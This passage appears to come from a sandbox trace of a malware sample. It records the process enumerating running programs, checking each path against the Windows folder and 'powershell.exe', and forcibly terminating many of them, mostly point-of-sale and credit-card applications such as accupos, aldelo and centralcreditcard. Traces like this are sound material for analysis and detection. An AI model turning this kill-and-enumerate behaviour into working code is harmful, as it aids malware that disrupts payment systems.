lpSrch="powershell.exe") returned 0x0 [0060.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\whatsapp.exe", lpSrch="powershell.exe") returned 0x0 [0060.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\whatsapp.exe", lpSrch="powershell.exe") returned 0x0 [0060.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\whatsapp.exe", lpSrch="powershell.exe") returned 0x0 [0060.180] StrStrIW (lpFirst="C:\\Program Files (x86)\\Google\\whatsapp.exe", lpSrch="powershell.exe") returned 0x0 [0060.180] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.181] GetTickCount () returned 0x1150869 [0060.181] GetCurrentProcessId () returned 0xf00 [0060.181] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xf3c) returned 0x404 [0060.181] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.181] TerminateProcess (hProcess=0x404, uExitCode=0x1150869) returned 1 [0060.182] CloseHandle (hObject=0x404) returned 1 [0060.182] CloseHandle (hObject=0x3fc) returned 1 [0060.182] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0060.183] GetCurrentProcessId () returned 0xf00 [0060.183] GetCurrentProcess () returned 0xffffffff [0060.183] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.183] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf7c) returned 0x3fc [0060.183] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Multimedia Platform\\winscp.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\winscp.exe")) returned 0x3d [0060.183] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\winscp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.183] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\winscp.exe", lpSrch="powershell.exe") returned 0x0 [0060.183] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\winscp.exe", lpSrch="powershell.exe") returned 0x0 [0060.183] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\winscp.exe", lpSrch="powershell.exe") returned 0x0 [0060.183] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\winscp.exe", lpSrch="powershell.exe") returned 0x0 [0060.183] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Multimedia Platform\\winscp.exe", lpSrch="powershell.exe") returned 0x0 [0060.183] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.183] GetTickCount () returned 0x1150869 [0060.183] GetCurrentProcessId () returned 0xf00 [0060.183] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xf7c) returned 0x404 [0060.184] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.184] TerminateProcess (hProcess=0x404, uExitCode=0x1150869) returned 1 [0060.185] CloseHandle (hObject=0x404) returned 1 [0060.185] CloseHandle (hObject=0x3fc) returned 1 [0060.185] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0060.186] GetCurrentProcessId () returned 0xf00 [0060.186] GetCurrentProcess () returned 0xffffffff [0060.186] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.186] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd9c) returned 0x3fc [0060.186] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\yahoomessenger.exe" (normalized: "c:\\program files (x86)\\windows media player\\yahoomessenger.exe")) returned 0x3e [0060.186] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\yahoomessenger.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.186] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\yahoomessenger.exe", lpSrch="powershell.exe") returned 0x0 [0060.186] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\yahoomessenger.exe", lpSrch="powershell.exe") returned 0x0 [0060.186] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\yahoomessenger.exe", lpSrch="powershell.exe") returned 0x0 [0060.186] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\yahoomessenger.exe", lpSrch="powershell.exe") returned 0x0 [0060.186] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\yahoomessenger.exe", lpSrch="powershell.exe") returned 0x0 [0060.186] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.186] GetTickCount () returned 0x1150869 [0060.186] GetCurrentProcessId () returned 0xf00 [0060.186] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xd9c) returned 0x404 [0060.186] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.186] TerminateProcess (hProcess=0x404, uExitCode=0x1150869) returned 1 [0060.258] CloseHandle (hObject=0x404) returned 1 [0060.258] CloseHandle (hObject=0x3fc) returned 1 [0060.258] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0060.259] GetCurrentProcessId () returned 0xf00 [0060.259] GetCurrentProcess () returned 0xffffffff [0060.259] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.259] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf98) returned 0x3fc [0060.259] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\active-charge.exe" (normalized: "c:\\program files (x86)\\common files\\active-charge.exe")) returned 0x35 [0060.260] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\active-charge.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.260] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\active-charge.exe", lpSrch="powershell.exe") returned 0x0 [0060.260] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\active-charge.exe", lpSrch="powershell.exe") returned 0x0 [0060.260] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\active-charge.exe", lpSrch="powershell.exe") returned 0x0 [0060.260] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\active-charge.exe", lpSrch="powershell.exe") returned 0x0 [0060.260] StrStrIW (lpFirst="C:\\Program Files (x86)\\Common Files\\active-charge.exe", lpSrch="powershell.exe") returned 0x0 [0060.260] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.260] GetTickCount () returned 0x11508b7 [0060.260] GetCurrentProcessId () returned 0xf00 [0060.260] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xf98) returned 0x404 [0060.260] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.260] TerminateProcess (hProcess=0x404, uExitCode=0x11508b7) returned 1 [0060.261] CloseHandle (hObject=0x404) returned 1 [0060.261] CloseHandle (hObject=0x3fc) returned 1 [0060.261] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0060.262] GetCurrentProcessId () returned 0xf00 [0060.262] GetCurrentProcess () returned 0xffffffff [0060.262] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.262] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xef8) returned 0x3fc [0060.262] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Adobe\\accupos.exe" (normalized: "c:\\program files (x86)\\adobe\\accupos.exe")) returned 0x28 [0060.262] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.262] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpSrch="powershell.exe") returned 0x0 [0060.262] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpSrch="powershell.exe") returned 0x0 [0060.262] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpSrch="powershell.exe") returned 0x0 [0060.263] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpSrch="powershell.exe") returned 0x0 [0060.263] StrStrIW (lpFirst="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpSrch="powershell.exe") returned 0x0 [0060.263] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.263] GetTickCount () returned 0x11508b7 [0060.263] GetCurrentProcessId () returned 0xf00 [0060.263] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xef8) returned 0x404 [0060.263] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.263] TerminateProcess (hProcess=0x404, uExitCode=0x11508b7) returned 1 [0060.264] CloseHandle (hObject=0x404) returned 1 [0060.264] CloseHandle (hObject=0x3fc) returned 1 [0060.264] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0060.264] GetCurrentProcessId () returned 0xf00 [0060.265] GetCurrentProcess () returned 0xffffffff [0060.265] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.265] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf18) returned 0x3fc [0060.265] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\MSBuild\\afr38.exe" (normalized: "c:\\program files\\msbuild\\afr38.exe")) returned 0x22 [0060.265] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\afr38.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.265] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\afr38.exe", lpSrch="powershell.exe") returned 0x0 [0060.265] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\afr38.exe", lpSrch="powershell.exe") returned 0x0 [0060.265] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\afr38.exe", lpSrch="powershell.exe") returned 0x0 [0060.265] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\afr38.exe", lpSrch="powershell.exe") returned 0x0 [0060.265] StrStrIW (lpFirst="C:\\Program Files\\MSBuild\\afr38.exe", lpSrch="powershell.exe") returned 0x0 [0060.265] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.265] GetTickCount () returned 0x11508b7 [0060.265] GetCurrentProcessId () returned 0xf00 [0060.265] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xf18) returned 0x404 [0060.265] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.265] TerminateProcess (hProcess=0x404, uExitCode=0x11508b7) returned 1 [0060.267] CloseHandle (hObject=0x404) returned 1 [0060.267] CloseHandle (hObject=0x3fc) returned 1 [0060.267] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0060.268] GetCurrentProcessId () returned 0xf00 [0060.268] GetCurrentProcess () returned 0xffffffff [0060.268] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.268] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3fc [0060.268] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Defender\\aldelo.exe" (normalized: "c:\\program files (x86)\\windows defender\\aldelo.exe")) returned 0x32 [0060.268] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\aldelo.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.268] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\aldelo.exe", lpSrch="powershell.exe") returned 0x0 [0060.270] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\aldelo.exe", lpSrch="powershell.exe") returned 0x0 [0060.270] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\aldelo.exe", lpSrch="powershell.exe") returned 0x0 [0060.270] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\aldelo.exe", lpSrch="powershell.exe") returned 0x0 [0060.270] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\aldelo.exe", lpSrch="powershell.exe") returned 0x0 [0060.270] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.270] GetTickCount () returned 0x11508c6 [0060.270] GetCurrentProcessId () returned 0xf00 [0060.270] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xfc0) returned 0x404 [0060.270] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.270] TerminateProcess (hProcess=0x404, uExitCode=0x11508c6) returned 1 [0060.271] CloseHandle (hObject=0x404) returned 1 [0060.271] CloseHandle (hObject=0x3fc) returned 1 [0060.271] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0060.272] GetCurrentProcessId () returned 0xf00 [0060.273] GetCurrentProcess () returned 0xffffffff [0060.273] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.273] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xfbc) returned 0x3fc [0060.273] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\ccv_server.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\ccv_server.exe")) returned 0x35 [0060.273] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\ccv_server.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.273] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\ccv_server.exe", lpSrch="powershell.exe") returned 0x0 [0060.273] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\ccv_server.exe", lpSrch="powershell.exe") returned 0x0 [0060.273] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\ccv_server.exe", lpSrch="powershell.exe") returned 0x0 [0060.273] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\ccv_server.exe", lpSrch="powershell.exe") returned 0x0 [0060.273] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\ccv_server.exe", lpSrch="powershell.exe") returned 0x0 [0060.273] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.273] GetTickCount () returned 0x11508c6 [0060.273] GetCurrentProcessId () returned 0xf00 [0060.273] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xfbc) returned 0x404 [0060.273] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.273] TerminateProcess (hProcess=0x404, uExitCode=0x11508c6) returned 1 [0060.275] CloseHandle (hObject=0x404) returned 1 [0060.275] CloseHandle (hObject=0x3fc) returned 1 [0060.275] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0060.276] GetCurrentProcessId () returned 0xf00 [0060.276] GetCurrentProcess () returned 0xffffffff [0060.276] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.276] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x794) returned 0x3fc [0060.276] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\centralcreditcard.exe" (normalized: "c:\\program files\\windowspowershell\\centralcreditcard.exe")) returned 0x38 [0060.276] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\centralcreditcard.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.276] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\centralcreditcard.exe", lpSrch="powershell.exe") returned 0x0 [0060.276] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\centralcreditcard.exe", lpSrch="powershell.exe") returned 0x0 [0060.276] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\centralcreditcard.exe", lpSrch="powershell.exe") returned 0x0 [0060.276] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\centralcreditcard.exe", lpSrch="powershell.exe") returned 0x0 [0060.276] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\centralcreditcard.exe", lpSrch="powershell.exe") returned 0x0 [0060.276] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.277] GetTickCount () returned 0x11508d6 [0060.277] GetCurrentProcessId () returned 0xf00 [0060.277] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x794) returned 0x404 [0060.277] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.277] TerminateProcess (hProcess=0x404, uExitCode=0x11508d6) returned 1 [0060.278] CloseHandle (hObject=0x404) returned 1 [0060.278] CloseHandle (hObject=0x3fc) returned 1 [0060.278] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0060.279] GetCurrentProcessId () returned 0xf00 [0060.279] GetCurrentProcess () returned 0xffffffff [0060.279] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.279] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xac0) returned 0x3fc [0060.279] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\creditservice.exe" (normalized: "c:\\program files\\microsoft office\\creditservice.exe")) returned 0x33 [0060.279] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\creditservice.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.280] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\creditservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.280] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\creditservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.280] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\creditservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.280] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\creditservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.280] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office\\creditservice.exe", lpSrch="powershell.exe") returned 0x0 [0060.280] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.280] GetTickCount () returned 0x11508d6 [0060.280] GetCurrentProcessId () returned 0xf00 [0060.280] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xac0) returned 0x404 [0060.280] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.280] TerminateProcess (hProcess=0x404, uExitCode=0x11508d6) returned 1 [0060.281] CloseHandle (hObject=0x404) returned 1 [0060.281] CloseHandle (hObject=0x3fc) returned 1 [0060.281] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0060.283] GetCurrentProcessId () returned 0xf00 [0060.283] GetCurrentProcess () returned 0xffffffff [0060.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.283] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xd6c) returned 0x3fc [0060.283] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Office\\edcsvr.exe" (normalized: "c:\\program files (x86)\\microsoft office\\edcsvr.exe")) returned 0x32 [0060.283] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\edcsvr.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.283] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\edcsvr.exe", lpSrch="powershell.exe") returned 0x0 [0060.283] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\edcsvr.exe", lpSrch="powershell.exe") returned 0x0 [0060.283] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\edcsvr.exe", lpSrch="powershell.exe") returned 0x0 [0060.283] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\edcsvr.exe", lpSrch="powershell.exe") returned 0x0 [0060.283] StrStrIW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\edcsvr.exe", lpSrch="powershell.exe") returned 0x0 [0060.283] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: 